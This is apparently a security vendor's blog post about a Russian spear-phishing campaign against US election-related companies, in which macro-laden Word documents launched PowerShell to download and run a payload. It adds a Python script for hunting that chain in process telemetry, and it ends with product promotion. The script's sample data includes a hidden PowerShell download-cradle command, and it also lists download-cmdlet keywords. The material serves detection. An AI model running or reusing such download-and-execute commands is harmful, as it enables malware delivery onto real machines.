The Intercept recently released a top secret internal memo detailing a sophisticated state-sponsored attack campaign aimed at obtaining information on election-related software and hardware.

According to the Intercept: “The top-secret National Security Agency document, which was provided anonymously to The Intercept and independently authenticated, analyzes intelligence very recently acquired by the agency about a months-long Russian intelligence cyber effort against elements of the U.S. election and voting infrastructure. The report, dated May 5, 2017, is the most detailed U.S. government account of Russian interference in the election that has yet come to light.”

About the Attack

These attacks utilized spear-phishing emails primarily themed as voter registration, spoofed election-related products and services, and researching absentee ballot disguises. Initial access to internal networks was accomplished when an unsuspecting user at the targeted company opened the attached Word document. An embedded macro in the Word document spawned PowerShell and used it to download and execute a payload from a U.S.-hosted IP address.
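The chain described above (an Office application spawning PowerShell that fetches a remote payload) can be hunted for in process-creation telemetry. The following is an added example, not code from the original post or from Carbon Black; it assumes events shaped like Sysmon Event ID 1 records (`Image`, `ParentImage`, `CommandLine`), and the sample events and address are constructed.

```python
import ntpath
import re

# Assumption: events are dicts shaped like Sysmon process-creation (Event ID 1)
# records, using its Image, ParentImage and CommandLine fields.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe"}
# Command-line fragments that indicate a network fetch from PowerShell.
DOWNLOAD_HINTS = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|start-bitstransfer", re.IGNORECASE)
REMOTE_HOST = re.compile(r"https?://([^/\s'\"]+)", re.IGNORECASE)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
OFFICE = "C:\\Program Files\\Microsoft Office\\Office16\\"


def exe(path):
    """Lower-cased executable name from a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return None, or a finding for an Office application spawning PowerShell."""
    if (exe(event["ParentImage"]) not in OFFICE_PARENTS
            or exe(event["Image"]) not in SHELL_CHILDREN):
        return None
    cmd = event.get("CommandLine", "")
    return {
        "parent": exe(event["ParentImage"]),
        # A fetch on the command line matches the download-and-execute stage.
        "severity": "high" if DOWNLOAD_HINTS.search(cmd) else "medium",
        "hosts": REMOTE_HOST.findall(cmd),
    }


# Constructed sample events; 192.0.2.0/24 is a reserved documentation range.
SAMPLE_EVENTS = [
    {"ParentImage": OFFICE + "WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c (New-Object "
                    "Net.WebClient).DownloadFile('http://192.0.2.10/a','a')"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\admin\inventory.ps1"},
    {"ParentImage": OFFICE + "EXCEL.EXE", "Image": PS,
     "CommandLine": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for finding in filter(None, map(classify, SAMPLE_EVENTS)):
        print(finding)
```

The extracted hosts give a pivot for scoping how far a campaign has spread: search the same telemetry for other endpoints that contacted them.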

Carbon Black’s Cb Defense will block weaponized Office documents out of the box, with complete visibility into the entire attack kill chain. The EDR features within Cb Defense allow you to quickly assess the proliferation of a spear-phishing campaign, with complete visibility and prevention across all stages of this attack.